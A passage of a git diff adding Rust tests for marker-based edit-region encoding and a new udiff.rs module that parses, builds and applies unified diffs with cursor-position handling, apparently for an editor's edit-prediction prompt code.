"NO_EDITS\n", + ) + .unwrap(); + assert_eq!(result, "NO_EDITS\n>>>>>>> UPDATED\n"); + } + + #[test] + fn test_encode_with_change() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = encode_from_old_and_new( + old, + new, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + assert!(result.contains("<|marker_1|>")); + assert!(result.contains("<|marker_2|>")); + assert!(result.contains("aaa\nBBB\nccc\n")); + assert!(result.ends_with(">>>>>>> UPDATED\n")); + } + + #[test] + fn test_roundtrip_encode_apply() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = encode_from_old_and_new( + old, + new, + None, + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + let output = encoded + .strip_suffix(">>>>>>> UPDATED\n") + .expect("should have end marker"); + let reconstructed = apply_marker_span(old, output).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_extract_editable_region_from_markers_multi() { + let text = "prefix\n<|marker_1|>\naaa\nbbb\n<|marker_2|>\nccc\nddd\n<|marker_3|>\nsuffix"; + let parsed = extract_editable_region_from_markers(text).unwrap(); + assert_eq!(parsed, "aaa\nbbb\nccc\nddd"); + } + + #[test] + fn test_extract_editable_region_two_markers() { + let text = "<|marker_1|>\none\ntwo three\n<|marker_2|>"; + let parsed = extract_editable_region_from_markers(text).unwrap(); + assert_eq!(parsed, "one\ntwo three"); + } + + #[test] + fn test_encode_with_cursor() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = encode_from_old_and_new( + old, + new, + Some(5), + "<|user_cursor|>", + ">>>>>>> UPDATED\n", + "NO_EDITS\n", + ) + .unwrap(); + assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("B<|user_cursor|>BB"), "result: {result}"); + } + + #[test] + fn test_extract_marker_span_strips_intermediate_markers() { + let text = "<|marker_2|>\nline1\n<|marker_3|>\nline2\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 2); + assert_eq!(end, 4); + assert_eq!(content, "line1\nline2\n"); + } + + #[test] + fn test_extract_marker_span_strips_multiple_intermediate_markers() { + let text = "<|marker_1|>\naaa\n<|marker_2|>\nbbb\n<|marker_3|>\nccc\n<|marker_4|>"; + let (start, end, content) = extract_marker_span(text).unwrap(); + assert_eq!(start, 1); + assert_eq!(end, 4); + assert_eq!(content, "aaa\nbbb\nccc\n"); + } + + #[test] + fn test_apply_marker_span_with_extra_intermediate_marker() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>\naaa\n<|marker_1|>\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_strip_marker_tags_inline() { + assert_eq!(strip_marker_tags("no markers here"), "no markers here"); + assert_eq!(strip_marker_tags("before<|marker_5|>after"), "beforeafter"); + assert_eq!( + strip_marker_tags("line1\n<|marker_3|>\nline2"), + "line1\nline2" + ); + } + + #[test] + fn test_write_editable_with_markers_v0316_byte_exact() { + let editable = "aaa\nbbb\nccc\n"; + let mut output = String::new(); + write_editable_with_markers_v0316(&mut output, editable, 4, "<|user_cursor|>"); + assert!(output.starts_with("<|marker_1|>")); + assert!(output.contains("<|user_cursor|>")); + let stripped = output.replace("<|user_cursor|>", ""); + let stripped = strip_marker_tags(&stripped); + assert_eq!(stripped, editable); + } + + #[test] + fn test_apply_marker_span_v0316_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>aaa\nBBB\nccc\n<|marker_2|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_v0316_no_edit() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|><|marker_1|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_apply_marker_span_v0316_no_edit_any_marker() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_2|>ignored content<|marker_2|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_apply_marker_span_v0316_multi_block() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let marker_offsets = compute_marker_offsets(old); + assert!( + marker_offsets.len() >= 3, + "expected at least 3 offsets, got {:?}", + marker_offsets + ); + + let new_content = "LINE1\nLINE2\nLINE3\n\nLINE5\nLINE6\nLINE7\nLINE8\n"; + let mut output = String::new(); + output.push_str("<|marker_1|>"); + for i in 0..marker_offsets.len() - 1 { + if i > 0 { + output.push_str(&marker_tag(i + 1)); + } + let start = marker_offsets[i]; + let end = marker_offsets[i + 1]; + let block_len = end - start; + output.push_str(&new_content[start..start + block_len]); + } + let last_marker_num = marker_offsets.len(); + output.push_str(&marker_tag(last_marker_num)); + let result = apply_marker_span_v0316(old, &output).unwrap(); + assert_eq!(result, new_content); + } + + #[test] + fn test_apply_marker_span_v0316_byte_exact_no_normalization() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker_1|>aaa\nBBB\nccc<|marker_2|>"; + let result = apply_marker_span_v0316(old, output).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc"); + } + + #[test] + fn test_encode_v0316_no_edits() { + let old = "aaa\nbbb\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.ends_with("<|end|>")); + let stripped = result.strip_suffix("<|end|>").unwrap(); + let result_parsed = apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(result_parsed, old); + } + + #[test] + fn test_encode_v0316_with_change() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|marker_1|>")); + assert!(result.contains("<|marker_2|>")); + assert!(result.ends_with("<|end|>")); + } + + #[test] + fn test_roundtrip_v0316() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0316_with_cursor() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0316(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("B<|user_cursor|>BB"), "result: {result}"); + } + + #[test] + fn test_roundtrip_v0316_multi_block_change() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n"; + let encoded = + encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0316(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_nearest_marker_number() { + let offsets = vec![0, 10, 20, 30]; + assert_eq!(nearest_marker_number(Some(0), &offsets), 1); + assert_eq!(nearest_marker_number(Some(9), &offsets), 2); + assert_eq!(nearest_marker_number(Some(15), &offsets), 2); + assert_eq!(nearest_marker_number(Some(25), &offsets), 3); + assert_eq!(nearest_marker_number(Some(30), &offsets), 4); + assert_eq!(nearest_marker_number(None, &offsets), 1); + } + + #[test] + fn test_marker_tag_relative_formats_as_expected() { + assert_eq!(marker_tag_relative(-2), "<|marker-2|>"); + assert_eq!(marker_tag_relative(-1), "<|marker-1|>"); + assert_eq!(marker_tag_relative(0), "<|marker-0|>"); + assert_eq!(marker_tag_relative(1), "<|marker+1|>"); + assert_eq!(marker_tag_relative(2), "<|marker+2|>"); + } + + #[test] + fn test_write_editable_with_markers_v0317_includes_relative_markers_and_cursor() { + let editable = "aaa\nbbb\nccc\n"; + let mut output = String::new(); + write_editable_with_markers_v0317(&mut output, editable, 4, "<|user_cursor|>"); + + assert!(output.contains("<|marker-0|>")); + assert!(output.contains("<|user_cursor|>")); + + let stripped = output.replace("<|user_cursor|>", ""); + let stripped = + collect_relative_marker_tags(&stripped) + .iter() + .fold(stripped.clone(), |acc, marker| { + let tag = &stripped[marker.tag_start..marker.tag_end]; + acc.replace(tag, "") + }); + assert_eq!(stripped, editable); + } + + #[test] + fn test_apply_marker_span_v0317_basic() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker-0|>aaa\nBBB\nccc\n<|marker+1|>"; + let result = apply_marker_span_v0317(old, output, Some(0)).unwrap(); + assert_eq!(result, "aaa\nBBB\nccc\n"); + } + + #[test] + fn test_apply_marker_span_v0317_no_edit() { + let old = "aaa\nbbb\nccc\n"; + let output = "<|marker-0|><|marker-0|>"; + let result = apply_marker_span_v0317(old, output, Some(0)).unwrap(); + assert_eq!(result, old); + } + + #[test] + fn test_encode_v0317_no_edits() { + let old = "aaa\nbbb\nccc\n"; + let result = + encode_from_old_and_new_v0317(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert_eq!(result, "<|marker-0|><|marker-0|><|end|>"); + } + + #[test] + fn test_roundtrip_v0317() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n"; + let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n"; + let cursor = Some(6); + + let encoded = + encode_from_old_and_new_v0317(old, new, cursor, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let stripped = stripped.replace("<|user_cursor|>", ""); + let reconstructed = apply_marker_span_v0317(old, &stripped, cursor).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0317_with_cursor_marker() { + let old = "aaa\nbbb\nccc\n"; + let new = "aaa\nBBB\nccc\n"; + let result = + encode_from_old_and_new_v0317(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap(); + assert!(result.contains("<|user_cursor|>"), "result: {result}"); + assert!(result.contains("<|marker-0|>"), "result: {result}"); + } + + #[test] + fn test_compute_marker_offsets_v0318_uses_larger_block_sizes() { + let text = "l1\nl2\nl3\n\nl5\nl6\nl7\nl8\nl9\nl10\nl11\nl12\nl13\n"; + let v0316_offsets = compute_marker_offsets(text); + let v0318_offsets = compute_marker_offsets_v0318(text); + + assert!(v0318_offsets.len() < v0316_offsets.len()); + assert_eq!(v0316_offsets.first().copied(), Some(0)); + assert_eq!(v0318_offsets.first().copied(), Some(0)); + assert_eq!(v0316_offsets.last().copied(), Some(text.len())); + assert_eq!(v0318_offsets.last().copied(), Some(text.len())); + } + + #[test] + fn test_roundtrip_v0318() { + let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n"; + let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0318_append_at_end_of_editable_region() { + let old = "line1\nline2\nline3\n"; + let new = "line1\nline2\nline3\nline4\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + + assert_ne!(encoded, "<|marker_2|><|end|>"); + + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_roundtrip_v0318_insert_at_internal_marker_boundary() { + let old = "alpha\nbeta\n\ngamma\ndelta\n"; + let new = "alpha\nbeta\n\ninserted\ngamma\ndelta\n"; + let encoded = + encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap(); + + let stripped = encoded + .strip_suffix("<|end|>") + .expect("should have end marker"); + let reconstructed = apply_marker_span_v0318(old, stripped).unwrap(); + assert_eq!(reconstructed, new); + } + + #[test] + fn test_encode_v0317_markers_stay_on_line_boundaries() { + let old = "\ +\t\t\t\tcontinue outer; +\t\t\t} +\t\t} +\t} + +\tconst intersectionObserver = new IntersectionObserver((entries) => { +\t\tfor (const entry of entries) { +\t\t\tif (entry.isIntersecting) { +\t\t\t\tintersectionObserver.unobserve(entry.target); +\t\t\t\tanchorPreload(/** @type {HTMLAnchorElement} */ (entry.target)); +\t\t\t} +\t\t} +\t}); + +\tconst observer = new MutationObserver(() => { +\t\tconst links = /** @type {NodeListOf} */ ( +\t\t\tdocument.querySelectorAll('a[data-preload]') +\t\t); + +\t\tfor (const link of links) { +\t\t\tif (linkSet.has(link)) continue; +\t\t\tlinkSet.add(link); + +\t\t\tswitch (link.dataset.preload) { +\t\t\t\tcase '': +\t\t\t\tcase 'true': +\t\t\t\tcase 'hover': { +\t\t\t\t\tlink.addEventListener('mouseenter', function callback() { +\t\t\t\t\t\tlink.removeEventListener('mouseenter', callback); +\t\t\t\t\t\tanchorPreload(link); +\t\t\t\t\t}); +"; + let new = old.replacen( + "\t\t\t\tcase 'true':\n", + "\t\t\t\tcase 'TRUE':<|user_cursor|>\n", + 1, + ); + + let cursor_offset = new.find("<|user_cursor|>").expect("cursor marker in new"); + let new_without_cursor = new.replace("<|user_cursor|>", ""); + + let encoded = encode_from_old_and_new_v0317( + old, + &new_without_cursor, + Some(cursor_offset), + "<|user_cursor|>", + "<|end|>", + ) + .unwrap(); + + let core = encoded.strip_suffix("<|end|>").unwrap_or(&encoded); + for marker in collect_relative_marker_tags(core) { + let tag_start = marker.tag_start; + assert!( + tag_start == 0 || core.as_bytes()[tag_start - 1] == b'\n', + "marker not at line boundary: {} in output:\n{}", + marker_tag_relative(marker.value), + core + ); + } + } +} diff --git a/crates/zeta_prompt/src/udiff.rs b/crates/zeta_prompt/src/udiff.rs new file mode 100644 index 0000000000000000000000000000000000000000..ab0837b9f54ac0bf9ef74038f0c876b751f70200 --- /dev/null +++ b/crates/zeta_prompt/src/udiff.rs @@ -0,0 +1,1406 @@ +use std::{ + borrow::Cow, + fmt::{Display, Write}, + mem, + ops::Range, +}; + +use anyhow::{Context as _, Result, anyhow}; +use imara_diff::{ + Algorithm, Sink, diff, + intern::{InternedInput, Interner, Token}, +}; + +pub fn strip_diff_path_prefix<'a>(diff: &'a str, prefix: &str) -> Cow<'a, str> { + if prefix.is_empty() { + return Cow::Borrowed(diff); + } + + let prefix_with_slash = format!("{}/", prefix); + let mut needs_rewrite = false; + + for line in diff.lines() { + match DiffLine::parse(line) { + DiffLine::OldPath { path } | DiffLine::NewPath { path } => { + if path.starts_with(&prefix_with_slash) { + needs_rewrite = true; + break; + } + } + _ => {} + } + } + + if !needs_rewrite { + return Cow::Borrowed(diff); + } + + let mut result = String::with_capacity(diff.len()); + for line in diff.lines() { + match DiffLine::parse(line) { + DiffLine::OldPath { path } => { + let stripped = path + .strip_prefix(&prefix_with_slash) + .unwrap_or(path.as_ref()); + result.push_str(&format!("--- a/{}\n", stripped)); + } + DiffLine::NewPath { path } => { + let stripped = path + .strip_prefix(&prefix_with_slash) + .unwrap_or(path.as_ref()); + result.push_str(&format!("+++ b/{}\n", stripped)); + } + _ => { + result.push_str(line); + result.push('\n'); + } + } + } + + Cow::Owned(result) +} + +/// Strip unnecessary git metadata lines from a diff, keeping only the lines +/// needed for patch application: path headers (--- and +++), hunk headers (@@), +/// and content lines (+, -, space). +pub fn strip_diff_metadata(diff: &str) -> String { + let mut result = String::new(); + + for line in diff.lines() { + let dominated = DiffLine::parse(line); + match dominated { + // Keep path headers, hunk headers, and content lines + DiffLine::OldPath { .. } + | DiffLine::NewPath { .. } + | DiffLine::HunkHeader(_) + | DiffLine::Context(_) + | DiffLine::Deletion(_) + | DiffLine::Addition(_) + | DiffLine::NoNewlineAtEOF => { + result.push_str(line); + result.push('\n'); + } + // Skip garbage lines (diff --git, index, etc.) + DiffLine::Garbage(_) => {} + } + } + + result +} + +/// Marker used to encode cursor position in patch comment lines. +pub const CURSOR_POSITION_MARKER: &str = "[CURSOR_POSITION]"; + +/// Extract cursor offset from a patch and return `(clean_patch, cursor_offset)`. +/// +/// Cursor position is encoded as a comment line (starting with `#`) containing +/// `[CURSOR_POSITION]`. A `^` in the line indicates the cursor column; a `<` +/// indicates column 0. The offset is computed relative to addition (`+`) and +/// context (` `) lines accumulated so far in the hunk, which represent the +/// cursor position within the new text contributed by the hunk. +pub fn extract_cursor_from_patch(patch: &str) -> (String, Option) { + let mut clean_patch = String::new(); + let mut cursor_offset: Option = None; + let mut line_start_offset = 0usize; + let mut prev_line_start_offset = 0usize; + + for line in patch.lines() { + let diff_line = DiffLine::parse(line); + + match &diff_line { + DiffLine::Garbage(content) + if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER) => + { + let caret_column = if let Some(caret_pos) = content.find('^') { + caret_pos + } else if content.find('<').is_some() { + 0 + } else { + continue; + }; + let cursor_column = caret_column.saturating_sub('#'.len_utf8()); + cursor_offset = Some(prev_line_start_offset + cursor_column); + } + _ => { + if !clean_patch.is_empty() { + clean_patch.push('\n'); + } + clean_patch.push_str(line); + + match diff_line { + DiffLine::Addition(content) | DiffLine::Context(content) => { + prev_line_start_offset = line_start_offset; + line_start_offset += content.len() + 1; + } + _ => {} + } + } + } + } + + if patch.ends_with('\n') && !clean_patch.is_empty() { + clean_patch.push('\n'); + } + + (clean_patch, cursor_offset) +} + +/// Find all byte offsets where `hunk.context` occurs as a substring of `text`. +/// +/// If no exact matches are found and the context ends with `'\n'` but `text` +/// does not, retries without the trailing newline, accepting only a match at +/// the very end of `text`. When this fallback fires, the hunk's context is +/// trimmed and its edit ranges are clamped so that downstream code doesn't +/// index past the end of the matched region. This handles diffs that are +/// missing a `\ No newline at end of file` marker: the parser always appends +/// `'\n'` via `writeln!`, so the context can have a trailing newline that +/// doesn't exist in the source text. +pub fn find_context_candidates(text: &str, hunk: &mut Hunk) -> Vec { + let candidates: Vec = text + .match_indices(&hunk.context) + .map(|(offset, _)| offset) + .collect(); + + if !candidates.is_empty() { + return candidates; + } + + if hunk.context.ends_with('\n') && !hunk.context.is_empty() { + let old_len = hunk.context.len(); + hunk.context.pop(); + let new_len = hunk.context.len(); + + if !hunk.context.is_empty() { + let candidates: Vec = text + .match_indices(&hunk.context) + .filter(|(offset, _)| offset + new_len == text.len()) + .map(|(offset, _)| offset) + .collect(); + + if !candidates.is_empty() { + for edit in &mut hunk.edits { + let touched_phantom = edit.range.end > new_len; + edit.range.start = edit.range.start.min(new_len); + edit.range.end = edit.range.end.min(new_len); + if touched_phantom { + // The replacement text was also written with a + // trailing '\n' that corresponds to the phantom + // newline we just removed from the context. + if edit.text.ends_with('\n') { + edit.text.pop(); + } + } + } + return candidates; + } + + // Restore if fallback didn't help either. + hunk.context.push('\n'); + debug_assert_eq!(hunk.context.len(), old_len); + } else { + hunk.context.push('\n'); + } + } + + Vec::new() +} + +/// Given multiple candidate offsets where context matches, use line numbers to disambiguate. +/// Returns the offset that matches the expected line, or None if no match or no line number available. +pub fn disambiguate_by_line_number( + candidates: &[usize], + expected_line: Option, + offset_to_line: &dyn Fn(usize) -> u32, +) -> Option { + match candidates.len() { + 0 => None, + 1 => Some(candidates[0]), + _ => { + let expected = expected_line?; + candidates + .iter() + .copied() + .find(|&offset| offset_to_line(offset) == expected) + } + } +} + +pub fn unified_diff_with_context( + old_text: &str, + new_text: &str, + old_start_line: u32, + new_start_line: u32, + context_lines: u32, +) -> String { + let input = InternedInput::new(old_text, new_text); + diff( + Algorithm::Histogram, + &input, + OffsetUnifiedDiffBuilder::new(&input, old_start_line, new_start_line, context_lines), + ) +} + +struct OffsetUnifiedDiffBuilder<'a> { + before: &'a [Token], + after: &'a [Token], + interner: &'a Interner<&'a str>, + pos: u32, + before_hunk_start: u32, + after_hunk_start: u32, + before_hunk_len: u32, + after_hunk_len: u32, + old_line_offset: u32, + new_line_offset: u32, + context_lines: u32, + buffer: String, + dst: String, +} + +impl<'a> OffsetUnifiedDiffBuilder<'a> { + fn new( + input: &'a InternedInput<&'a str>, + old_line_offset: u32, + new_line_offset: u32, + context_lines: u32, + ) -> Self { + Self { + before_hunk_start: 0, + after_hunk_start: 0, + before_hunk_len: 0, + after_hunk_len: 0, + old_line_offset, + new_line_offset, + context_lines, + buffer: String::with_capacity(8), + dst: String::new(), + interner: &input.interner, + before: &input.before, + after: &input.after, + pos: 0, + } + } + + fn print_tokens(&mut self, tokens: &[Token], prefix: char) { + for &token in tokens { + writeln!(&mut self.buffer, "{prefix}{}", self.interner[token]).unwrap(); + } + } + + fn flush(&mut self) { + if self.before_hunk_len == 0 && self.after_hunk_len == 0 { + return; + } + + let end = (self.pos + self.context_lines).min(self.before.len() as u32); + self.update_pos(end, end); + + writeln!( + &mut self.dst, + "@@ -{},{} +{},{} @@", + self.before_hunk_start + 1 + self.old_line_offset, + self.before_hunk_len, + self.after_hunk_start + 1 + self.new_line_offset, + self.after_hunk_len, + ) + .unwrap(); + write!(&mut self.dst, "{}", &self.buffer).unwrap(); + self.buffer.clear(); + self.before_hunk_len = 0; + self.after_hunk_len = 0; + } + + fn update_pos(&mut self, print_to: u32, move_to: u32) { + self.print_tokens(&self.before[self.pos as usize..print_to as usize], ' '); + let len = print_to - self.pos; + self.before_hunk_len += len; + self.after_hunk_len += len; + self.pos = move_to; + } +} + +impl Sink for OffsetUnifiedDiffBuilder<'_> { + type Out = String; + + fn process_change(&mut self, before: Range, after: Range) { + if before.start - self.pos > self.context_lines * 2 { + self.flush(); + } + if self.before_hunk_len == 0 && self.after_hunk_len == 0 { + self.pos = before.start.saturating_sub(self.context_lines); + self.before_hunk_start = self.pos; + self.after_hunk_start = after.start.saturating_sub(self.context_lines); + } + + self.update_pos(before.start, before.end); + self.before_hunk_len += before.end - before.start; + self.after_hunk_len += after.end - after.start; + self.print_tokens( + &self.before[before.start as usize..before.end as usize], + '-', + ); + self.print_tokens(&self.after[after.start as usize..after.end as usize], '+'); + } + + fn finish(mut self) -> Self::Out { + self.flush(); + self.dst + } +} + +pub fn encode_cursor_in_patch(patch: &str, cursor_offset: Option) -> String { + let Some(cursor_offset) = cursor_offset else { + return patch.to_string(); + }; + + let mut result = String::new(); + let mut line_start_offset = 0usize; + + for line in patch.lines() { + if matches!( + DiffLine::parse(line), + DiffLine::Garbage(content) + if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER) + ) { + continue; + } + + if !result.is_empty() { + result.push('\n'); + } + result.push_str(line); + + match DiffLine::parse(line) { + DiffLine::Addition(content) => { + let line_end_offset = line_start_offset + content.len(); + + if cursor_offset >= line_start_offset && cursor_offset <= line_end_offset { + let cursor_column = cursor_offset - line_start_offset; + + result.push('\n'); + result.push('#'); + for _ in 0..cursor_column { + result.push(' '); + } + write!(result, "^{}", CURSOR_POSITION_MARKER).unwrap(); + } + + line_start_offset = line_end_offset + 1; + } + DiffLine::Context(content) => { + line_start_offset += content.len() + 1; + } + _ => {} + } + } + + if patch.ends_with('\n') { + result.push('\n'); + } + + result +} + +pub fn apply_diff_to_string(diff_str: &str, text: &str) -> Result { + apply_diff_to_string_with_hunk_offset(diff_str, text).map(|(text, _)| text) +} + +/// Applies a diff to a string and returns the result along with the offset where +/// the first hunk's context matched in the original text. This offset can be used +/// to adjust cursor positions that are relative to the hunk's content. +pub fn apply_diff_to_string_with_hunk_offset( + diff_str: &str, + text: &str, +) -> Result<(String, Option)> { + let mut diff = DiffParser::new(diff_str); + + let mut text = text.to_string(); + let mut first_hunk_offset = None; + + while let Some(event) = diff.next().context("Failed to parse diff")? { + match event { + DiffEvent::Hunk { + mut hunk, + path: _, + status: _, + } => { + let candidates = find_context_candidates(&text, &mut hunk); + + let hunk_offset = + disambiguate_by_line_number(&candidates, hunk.start_line, &|offset| { + text[..offset].matches('\n').count() as u32 + }) + .ok_or_else(|| anyhow!("couldn't resolve hunk"))?; + + if first_hunk_offset.is_none() { + first_hunk_offset = Some(hunk_offset); + } + + for edit in hunk.edits.iter().rev() { + let range = (hunk_offset + edit.range.start)..(hunk_offset + edit.range.end); + text.replace_range(range, &edit.text); + } + } + DiffEvent::FileEnd { .. } => {} + } + } + + Ok((text, first_hunk_offset)) +} + +struct PatchFile<'a> { + old_path: Cow<'a, str>, + new_path: Cow<'a, str>, +} + +pub struct DiffParser<'a> { + current_file: Option>, + current_line: Option<(&'a str, DiffLine<'a>)>, + hunk: Hunk, + diff: std::str::Lines<'a>, + pending_start_line: Option, + processed_no_newline: bool, + last_diff_op: LastDiffOp, +} + +#[derive(Clone, Copy, Default)] +enum LastDiffOp { + #[default] + None, + Context, + Deletion, + Addition, +} + +#[derive(Debug, PartialEq)] +pub enum DiffEvent<'a> { + Hunk { + path: Cow<'a, str>, + hunk: Hunk, + status: FileStatus, + }, + FileEnd { + renamed_to: Option>, + }, +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum FileStatus { + Created, + Modified, + Deleted, +} + +#[derive(Debug, Default, PartialEq)] +pub struct Hunk { + pub context: String, + pub edits: Vec, + pub start_line: Option, +} + +impl Hunk { + pub fn is_empty(&self) -> bool { + self.context.is_empty() && self.edits.is_empty() + } +} + +#[derive(Debug, PartialEq)] +pub struct Edit { + pub range: Range, + pub text: String, +} + +impl<'a> DiffParser<'a> { + pub fn new(diff: &'a str) -> Self { + let mut diff = diff.lines(); + let current_line = diff.next().map(|line| (line, DiffLine::parse(line))); + DiffParser { + current_file: None, + hunk: Hunk::default(), + current_line, + diff, + pending_start_line: None, + processed_no_newline: false, + last_diff_op: LastDiffOp::None, + } + } + + pub fn next(&mut self) -> Result>> { + loop { + let (hunk_done, file_done) = match self.current_line.as_ref().map(|e| &e.1) { + Some(DiffLine::OldPath { .. }) | Some(DiffLine::Garbage(_)) | None => (true, true), + Some(DiffLine::HunkHeader(_)) => (true, false), + _ => (false, false), + }; + + if hunk_done { + if let Some(file) = &self.current_file + && !self.hunk.is_empty() + { + let status = if file.old_path == "/dev/null" { + FileStatus::Created + } else if file.new_path == "/dev/null" { + FileStatus::Deleted + } else { + FileStatus::Modified + }; + let path = if status == FileStatus::Created { + file.new_path.clone() + } else { + file.old_path.clone() + }; + let mut hunk = mem::take(&mut self.hunk); + hunk.start_line = self.pending_start_line.take(); + self.processed_no_newline = false; + self.last_diff_op = LastDiffOp::None; + return Ok(Some(DiffEvent::Hunk { path, hunk, status })); + } + } + + if file_done { + if let Some(PatchFile { old_path, new_path }) = self.current_file.take() { + return Ok(Some(DiffEvent::FileEnd { + renamed_to: if old_path != new_path && old_path != "/dev/null" { + Some(new_path) + } else { + None + }, + })); + } + } + + let Some((line, parsed_line)) = self.current_line.take() else { + break; + }; + + (|| { + match parsed_line { + DiffLine::OldPath { path } => { + self.current_file = Some(PatchFile { + old_path: path, + new_path: "".into(), + }); + } + DiffLine::NewPath { path } => { + if let Some(current_file) = &mut self.current_file { + current_file.new_path = path + } + } + DiffLine::HunkHeader(location) => { + if let Some(loc) = location { + self.pending_start_line = Some(loc.start_line_old); + } + } + DiffLine::Context(ctx) => { + if self.current_file.is_some() { + writeln!(&mut self.hunk.context, "{ctx}")?; + self.last_diff_op = LastDiffOp::Context; + } + } + DiffLine::Deletion(del) => { + if self.current_file.is_some() { + let range = self.hunk.context.len() + ..self.hunk.context.len() + del.len() + '\n'.len_utf8(); + if let Some(last_edit) = self.hunk.edits.last_mut() + && last_edit.range.end == range.start + { + last_edit.range.end = range.end; + } else { + self.hunk.edits.push(Edit { + range, + text: String::new(), + }); + } + writeln!(&mut self.hunk.context, "{del}")?; + self.last_diff_op = LastDiffOp::Deletion; + } + } + DiffLine::Addition(add) => { + if self.current_file.is_some() { + let range = self.hunk.context.len()..self.hunk.context.len(); + if let Some(last_edit) = self.hunk.edits.last_mut() + && last_edit.range.end == range.start + { + writeln!(&mut last_edit.text, "{add}").unwrap(); + } else { + self.hunk.edits.push(Edit { + range, + text: format!("{add}\n"), + }); + } + self.last_diff_op = LastDiffOp::Addition; + } + } + DiffLine::NoNewlineAtEOF => { + if !self.processed_no_newline { + self.processed_no_newline = true; + match self.last_diff_op { + LastDiffOp::Addition => { + // Remove trailing newline from the last addition + if let Some(last_edit) = self.hunk.edits.last_mut() { + last_edit.text.pop(); + } + } + LastDiffOp::Deletion => { + // Remove trailing newline from context (which includes the deletion) + self.hunk.context.pop(); + if let Some(last_edit) = self.hunk.edits.last_mut() { + last_edit.range.end -= 1; + } + } + LastDiffOp::Context | LastDiffOp::None => { + // Remove trailing newline from context + self.hunk.context.pop(); + } + } + } + } + DiffLine::Garbage(_) => {} + } + + anyhow::Ok(()) + })() + .with_context(|| format!("on line:\n\n```\n{}```", line))?; + + self.current_line = self.diff.next().map(|line| (line, DiffLine::parse(line))); + } + + anyhow::Ok(None) + } +} + +#[derive(Debug, PartialEq)] +pub enum DiffLine<'a> { + OldPath { path: Cow<'a, str> }, + NewPath { path: Cow<'a, str> }, + HunkHeader(Option), + Context(&'a str), + 